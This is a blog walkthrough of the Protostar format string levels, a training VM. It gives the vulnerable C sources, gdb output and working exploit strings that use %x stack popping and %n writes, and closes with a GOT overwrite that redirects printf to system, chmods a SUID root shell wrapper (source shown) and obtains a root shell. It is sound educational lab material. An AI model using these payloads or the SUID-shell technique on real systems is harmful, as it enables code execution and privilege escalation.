Protostar Walkthrough - Format Strings

- (16 min read)

Protostar is a virtual machine from Exploit Exercises that goes through basic memory corruption issues.

This blog post is a continuation from my previous writeup on the stack exploitation stages of Protostar and will deal with the format string exercises.

scut's Exploiting Format String Vulnerabilities is a good primer to read before following along the walkthrough.

The sha1sum of the ISO I am working with is d030796b11e9251f34ee448a95272a4d432cf2ce.

format 0

We are given the below source code.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];

  target = 0;

  sprintf(buffer, string);

  if(target == 0xdeadbeef) {
      printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

While we can obviously exploit this via a standard stack buffer overflow, we want to do this by exploiting format strings. We are told that this level should be done in less than 10 bytes of input.

We take a look at a disassembly of the vuln() function.

(gdb) disass vuln
Dump of assembler code for function vuln:
0x080483f4 <vuln+0>:    push   %ebp
0x080483f5 <vuln+1>:    mov    %esp,%ebp
0x080483f7 <vuln+3>:    sub    $0x68,%esp
0x080483fa <vuln+6>:    movl   $0x0,-0xc(%ebp)
0x08048401 <vuln+13>:   mov    0x8(%ebp),%eax
0x08048404 <vuln+16>:   mov    %eax,0x4(%esp)
0x08048408 <vuln+20>:   lea    -0x4c(%ebp),%eax
0x0804840b <vuln+23>:   mov    %eax,(%esp)
0x0804840e <vuln+26>:   call   0x8048300 <sprintf@plt>
0x08048413 <vuln+31>:   mov    -0xc(%ebp),%eax
0x08048416 <vuln+34>:   cmp    $0xdeadbeef,%eax
0x0804841b <vuln+39>:   jne    0x8048429 <vuln+53>
0x0804841d <vuln+41>:   movl   $0x8048510,(%esp)
0x08048424 <vuln+48>:   call   0x8048330 <puts@plt>
0x08048429 <vuln+53>:   leave
0x0804842a <vuln+54>:   ret
End of assembler dump.

The interesting memory locations here are -0x4c(%ebp) which belongs to buffer and -0xc(%ebp) which belongs to target.

One method of exploiting format strings is pretty similar to buffer overflows. You can write a large string into a buffer with a relatively short format string. For example, a format string %128d results in a 128 byte string. Using this trick, it is simple to write past buffer into target. We want to create a format string that writes 64 characters followed by 0xdeadbeef, which results in target being overwritten.

user@protostar:~$ /opt/protostar/bin/format0 $(python -c "print '%64d\xef\xbe\xad\xde'")
you have hit the target correctly :)

format 1

We are given the below source code.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
  printf(string);

  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

Like before, we want to overwrite target. However, this time target's location on the stack is very far away from our current location on the stack.

(gdb) info reg
eax            0x0      0
ecx            0x87cb0d94       -2016735852
edx            0x1      1
ebx            0xb7fd7ff4       -1208123404
esp            0xbffff760       0xbffff760
ebp            0xbffff778       0xbffff778
esi            0x0      0
edi            0x0      0
eip            0x80483fa        0x80483fa <vuln+6>
eflags         0x200286 [ PF SF IF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) print &target
$1 = (int *) 0x8049638

With format string vulnerabilities, you are able to directly write into an arbitrary memory address. The %n format parameter writes the number of bytes written so far by the format string function into a memory address referenced by a pointer. The pointer, like all other parameters, is passed through the stack. Since our input to the printf() function is stored on the stack (as it is passed through argv), we have all the neccessary components to exploit this.

The first hurdle to exploitation is that the printf() is not in the same stack frame as the input string. This usually means that the input string is very far away from our current stack pointer. We first need to locate where the start of our input string is.

Conveniently, format string vulnerabiltiies provide us with a very easy way to read the stack. Each %x prints out the next 4 bytes on the stack and moves the stack pointer forward by the same amount. The fact that format string vulnerabilities provide both a read and write primitive is why they are so powerful.

user@protostar:/opt/protostar/bin$ /opt/protostar/bin/format1 $(python -c "print 'AAAA' + '%x.%x'")
AAAA804960c.bffff788

We want to increment this until we locate the start of our input string (0x41414141) on the stack. This is known as "stack popping".

user@protostar:/opt/protostar/bin$ /opt/protostar/bin/format1 $(python -c "print 'AAAA' + '%x.'*134 + '%x'")
AAAA804960c.bffff5f8.8048469.b7fd8304.b7fd7ff4.bffff5f8.8048435.bffff7dc.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff678.b7eadc76.2.bffff6a4.bffff6b0.b7fe1848.bffff660.ffffffff.b7ffeff4.804824d.1.bffff660.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff678.230a9a2b.95eec3b.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff6a4.8048450.8048440.b7ff1040.bffff69c.b7fff8f8.2.bffff7c1.bffff7dc.0.bffff975.bffff983.bffff98f.bffff9b0.bffff9c3.bffff9d6.bffff9e0.bffffed0.bfffff0e.bfffff22.bfffff39.bfffff4a.bfffff52.bfffff62.bfffff6f.bfffffa3.bfffffb2.bfffffcf.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff7ab.1f.bfffffe1.f.bffff7bb.0.0.0.0.0.77000000.4d5d1483.52aa6e73.a62e2707.69255758.363836.706f2f00.72702f74.736f746f.2f726174.2f6e6962.6d726f66.317461.41414141

Now, we can replace "AAAA" with the address of target and the final %x with %n to write to the address.

user@protostar:/opt/protostar/bin$ /opt/protostar/bin/format1 $(python -c "print '\x38\x96\x04\x08' + '%x.'*134 + '%n'")
804960c.bffff5f8.8048469.b7fd8304.b7fd7ff4.bffff5f8.8048435.bffff7dc.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff678.b7eadc76.2.bffff6a4.bffff6b0.b7fe1848.bffff660.ffffffff.b7ffeff4.804824d.1.bffff660.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff678.b4f3baa6.9ea7ccb6.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff6a4.8048450.8048440.b7ff1040.bffff69c.b7fff8f8.2.bffff7c1.bffff7dc.0.bffff975.bffff983.bffff98f.bffff9b0.bffff9c3.bffff9d6.bffff9e0.bffffed0.bfffff0e.bfffff22.bfffff39.bfffff4a.bfffff52.bfffff62.bfffff6f.bfffffa3.bfffffb2.bfffffcf.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff7ab.1f.bfffffe1.f.bffff7bb.0.0.0.0.0.f1000000.ddb611b5.5aeca58f.e7cb7a22.691b4515.363836.706f2f00.72702f74.736f746f.2f726174.2f6e6962.6d726f66.317461.you have modified the target :)

With this method of exploitation, the key is to align your input string with the stack pointer. It is important to remember that the format string you supply is stored on the stack as well. With %x, you are using 2 bytes to pop 4 bytes from the stack. There are other format string parameters you can use as well to win the "race" if you can only provide a limited number of input bytes.

format 2

We are given the below source code.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);

  if(target == 64) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %d :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}

This is similar to format 1 except that we now have to write a specific value to target.

We locate the start of our input string. This time, it's much easier since it gets copied to a buffer in the same stack frame as our printf()function.

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA' + '%x.'*3 + '%x'" | /opt/protostar/bin/format2
AAAA200.b7fd8420.bffff5c4.41414141
target is 0 :(

With GDB, we find the memory address of target.

(gdb) print &target
$2 = (int *) 0x80496e4

We demonstrate that we can write to target.

user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%x.'*3 + '%n'" | /opt/protostar/bin/format2
200.b7fd8420.bffff5c4.
target is 26 :(

Now, remember that %n writes the number of bytes that have already been written by the function. We have control over that since we can supply different format string parameters to write more or less bytes. This is usually done by using %nu where n is a number that we can manipulate to write the number of bytes we want.

user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%x.'*2 + '%47u' + '%n'" | /opt/protostar/bin/format2
200.b7fd8420.                                     3221222852
you have modified the target :)

format 3

We are given the below source code.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
  printf(string);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printbuffer(buffer);

  if(target == 0x01025544) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %08x :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}

This is similar to format 2 except that we now have to precisely control what gets written to target.

Again, we start by locating the start of our input string.

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA' + '%x.'*11 + '%x'" | /opt/protostar/bin/format3
AAAA0.bffff580.b7fd7ff4.0.0.bffff788.804849d.bffff580.200.b7fd8420.bffff5c4.41414141
target is 00000000 :(

We also find the memory address of target.

(gdb) print &target
$2 = (int *) 0x80496f4

We show that we are able to write to target.

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + '%x.'*11 + '%n'" | /opt/protostar/bin/format3
0.bffff580.b7fd7ff4.0.0.bffff788.804849d.bffff580.200.b7fd8420.bffff5c4.
target is 0000004c :(

With format strings, we can supply different addresses one after another on the stack and supply multiple %n parameters to write to the least significant byte of each address in sequence.

For example, we can write to all 4 bytes of target.

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08\xf7\x96\x04\x08' + '%x.'*11 + '%n%n%n%n'" | /opt/protostar/bin/format3
0.bffff580.b7fd7ff4.0.0.bffff788.804849d.bffff580.200.b7fd8420.bffff5c4.
target is 58585858 :(

How do we control the value that gets writen for each individual byte? We use the same %nu technique. Before we can place a %nu before each %n, we need to pad our input string since each %nu also pops the stack. We do this by adding \x01\x01\x01\x01 before each address in our input string.

user@protostar:/opt/protostar/bin$ python -c "print '\x01\x01\x01\x01\xf4\x96\x04\x08\x01\x01\x01\x01\xf5\x96\x04\x08\x01\x01\x01\x01\xf6\x96\x04\x08\x01\x01\x01\x01\xf7\x96\x04\x08' + '%x.'*11 + '%u%n%u%n%u%n%u%n'" | /opt/protostar/bin/format3
0.bffff580.b7fd7ff4.0.0.bffff788.804849d.bffff580.200.b7fd8420.bffff5c4.16843009168430091684300916843009
target is 88807870 :(

The final step here is to determine the n value for each %nu format parameter. scut's paper has a method we can use to calculate the value. We translate it to a Python function.

def calculate(to_write, written):
    to_write += 0x100
    written %= 0x100
    padding = (to_write - written) % 0x100
    if padding < 10:
        padding += 0x100
    return padding

to_write is the value we want to write at a particular %n, written is the number of bytes that have been written by the format string function so far. calculate(0x44, 0x68) gets us 220. How do we get 0x68? Remember when we first demonstrated writing to all 4 bytes of target and we wrote 0x58 to each byte? We increased the length of our input string by 16 bytes (\x01\x01\x01\01 * 4) so we add 0x58 + 16 = 0x68.

user@protostar:/opt/protostar/bin$ python -c "print '\x01\x01\x01\x01\xf4\x96\x04\x08\x01\x01\x01\x01\xf5\x96\x04\x08\x01\x01\x01\x01\xf6\x96\x04\x08\x01\x01\x01\x01\xf7\x96\x04\x08' + '%x.'*11 + '%220u%n%u%n%u%n%u%n'" | /opt/protostar/bin/format3
0.bffff580.b7fd7ff4.0.0.bffff788.804849d.bffff580.200.b7fd8420.bffff5c4.                                                                                                                                                                                                                    16843009168430091684300916843009
target is 5c544c44 :(

From here, it is easy to calculate the other 3 n values. We simply use the previous byte as the written parameter and the target byte as the to_write parameter in our Python function. Doing this, we see that the 4 n values we need to supply are 220, 17, 173 and 255.

user@protostar:/opt/protostar/bin$ python -c "print '\x01\x01\x01\x01\xf4\x96\x04\x08\x01\x01\x01\x01\xf5\x96\x04\x08\x01\x01\x01\x01\xf6\x96\x04\x08\x01\x01\x01\x01\xf7\x96\x04\x08' + '%x.'*11 + '%220u%n%17u%n%173u%n%255u%n'" | /opt/protostar/bin/format3
0.bffff580.b7fd7ff4.0.0.bffff788.804849d.bffff580.200.b7fd8420.bffff5c4.                                                                                                                                                                                                                    16843009         16843009                                                                                                                                                                     16843009                                                                                                                                                                                                                                                       16843009
you have modified the target :)

format 4

We are given the below source code.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);
}

int main(int argc, char **argv)
{
  vuln();
}

In this level, our goal is to redirect execution to the hello() function.

We start by taking a look at the disassembly of the vuln() function.

(gdb) disass vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>:    push   %ebp
0x080484d3 <vuln+1>:    mov    %esp,%ebp
0x080484d5 <vuln+3>:    sub    $0x218,%esp
0x080484db <vuln+9>:    mov    0x8049730,%eax
0x080484e0 <vuln+14>:   mov    %eax,0x8(%esp)
0x080484e4 <vuln+18>:   movl   $0x200,0x4(%esp)
0x080484ec <vuln+26>:   lea    -0x208(%ebp),%eax
0x080484f2 <vuln+32>:   mov    %eax,(%esp)
0x080484f5 <vuln+35>:   call   0x804839c <fgets@plt>
0x080484fa <vuln+40>:   lea    -0x208(%ebp),%eax
0x08048500 <vuln+46>:   mov    %eax,(%esp)
0x08048503 <vuln+49>:   call   0x80483cc <printf@plt>
0x08048508 <vuln+54>:   movl   $0x1,(%esp)
0x0804850f <vuln+61>:   call   0x80483ec <exit@plt>
End of assembler dump.

We are going to redirect the execution flow by overwriting the entry for the exit() function in the Global Offset Table (GOT). Without going into great detail, the GOT is essentially how shared library functions are loaded in a dynamically linked ELF binary. Eli Bendersky's blog post has a good explanation on how it works.

Taking a look at the binary with objdump, we see that the exit() function has an entry in the GOT at 0x08049724. If we overwrite the value at that address with the memory address of hello() we should be successful.

user@protostar:/opt/protostar/bin$ objdump -TR /opt/protostar/bin/format4

/opt/protostar/bin/format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*  00000000              __gmon_start__
00000000      DF *UND*  00000000  GLIBC_2.0   fgets
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*  00000000  GLIBC_2.0   _exit
00000000      DF *UND*  00000000  GLIBC_2.0   printf
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   exit
080485ec g    DO .rodata        00000004  Base        _IO_stdin_used
08049730 g    DO .bss   00000004  GLIBC_2.0   stdin


DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit

As with all format string attacks, we start by locating the input string on the stack.

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA' + '%x.'*3 + '%x'" | /opt/protostar/bin/format4
AAAA200.b7fd8420.bffff5c4.41414141

Next, we attempt to write all 4 bytes of the exit() GOT entry.

user@protostar:/tmp$ python -c "print '\x24\x97\x04\x08\x25\x97\x04\x08\x26\x97\x04\x08\x27\x97\x04\x08' + '%x.'*3 + '%n%n%n%n'"> a
(gdb) run < a
Starting program: /opt/protostar/bin/format4 < a
200.b7fd8420.bffff5b4.

Program received signal SIGSEGV, Segmentation fault.
0x26262626 in ?? ()

And look for the memory address of the hello() function.

(gdb) print &hello
$1 = (void (*)(void)) 0x80484b4 <hello>

With all that information, we can calculate that the 4 n's we need to supply to the %nu format string parameters are 126, 208, 128 and 260. If you are unsure how to do this, you can go back to format 3's explanation.

Putting everything together,

user@protostar:/tmp$ python -c "print '\x01\x01\x01\x01\x24\x97\x04\x08\x01\x01\x01\x01\x25\x97\x04\x08\x01\x01\x01\x01\x26\x97\x04\x08\x01\x01\x01\x01\x27\x97\x04\x08' + '%x.'*3 + '%126u%n%208u%n%128u%n%260u%n'" | /opt/protostar/bin/format4
200.b7fd8420.bffff5d4.                                                                                                                      16843009                                                                                                                                                                                                        16843009                                                                                                                        16843009                                                                                                                                                                                                                                                            16843009
code execution redirected! you win

While this is the end of the challenge itself, it would be boring to end this blog post without a shell. We will use the same GOT entry overwrite method to obtain code execution on the target binary.

There is however a problem. If we overwrite exit() with system(), we will end up calling system(1) and we have no way to change that value. Instead, we will overwrite exit() with vuln() and printf() with system() so that we can pass our shell command through stdin in the second call to vuln().

We look for the memory address of the system() and vuln() functions.

(gdb) print &system
$1 = (<text variable, no debug info> *) 0xb7ecffb0 <__libc_system>
(gdb) print &vuln
$1 = (void (*)(void)) 0x80484d2 <vuln>

We successfully overwrite the GOT entries for exit() and printf().

user@protostar:~$ python -c "print '\x24\x97\x04\x08\x25\x97\x04\x08\x26\x97\x04\x08\x27\x97\x04\x08\x1c\x97\x04\x08\x1d\x97\x04\x08\x1e\x97\x04\x08\x1f\x97\x04\x08' + '%x.'*3 + '%n%n%n%n%n%n%n%n'" > a
(gdb) run < a
Starting program: /opt/protostar/bin/format4 < a
200.b7fd8420.bffff5b4.

Program received signal SIGSEGV, Segmentation fault.
0x36363636 in ?? ()

(gdb) x/x 0x0804971c
0x804971c <_GLOBAL_OFFSET_TABLE_+28>:   0x36363636
(gdb) x/x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>:   0x36363636

The 8 n's we need to supply to the %nu format string parameters are 124, 178, 128, 260, 168, 79, 237 and 203.

Now, what do we want system() to call? As with all stdin based exploit vectors, it is a bit of an ugly hack to get the standard system("/bin/sh") to work. Like in my previous blog post on the stack exploitation exercises, I prefer to write a root owned SUID shell wrapper, shell.c.

#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/bin/bash");
}

We compile the C code.

user@protostar:~$ gcc shell.c -o shell

Putting everything together, we get the following. You will see that we have a \x0a in there which is a NULL byte. This tells the first fgets() call to stop reading from stdin. We follow that by the command string we want system() to run on the second call to vuln().

user@protostar:~$ python -c "print '\x01\x01\x01\x01\x24\x97\x04\x08\x01\x01\x01\x01\x25\x97\x04\x08\x01\x01\x01\x01\x26\x97\x04\x08\x01\x01\x01\x01\x27\x97\x04\x08\x01\x01\x01\x01\x1c\x97\x04\x08\x01\x01\x01\x01\x1d\x97\x04\x08\x01\x01\x01\x01\x1e\x97\x04\x08\x01\x01\x01\x01\x1f\x97\x04\x08' + '%x.'*3 + '%124u%n%178u%n%128u%n%260u%n%168u%n%79u%n%237u%n%203u%n\x0a/bin/chown root:root /home/user/shell; /bin/chmod 4755 /home/user/shell'" | /opt/protostar/bin/format4
200.b7fd8420.bffff5d4.                                                                                                                    16843009                                                                                                                                                                          16843009                                                                                                                        16843009                                                                                                                                                                                                                                                            16843009                                                                                                                                                                16843009                                                                       16843009                                                                                                                                                                                                                                     16843009                                                                                                                                                                                                   16843009
sh: : not found
sh: : not found
^C^CSegmentation fault

user@protostar:~$ ./shell
root@protostar:~# whoami
root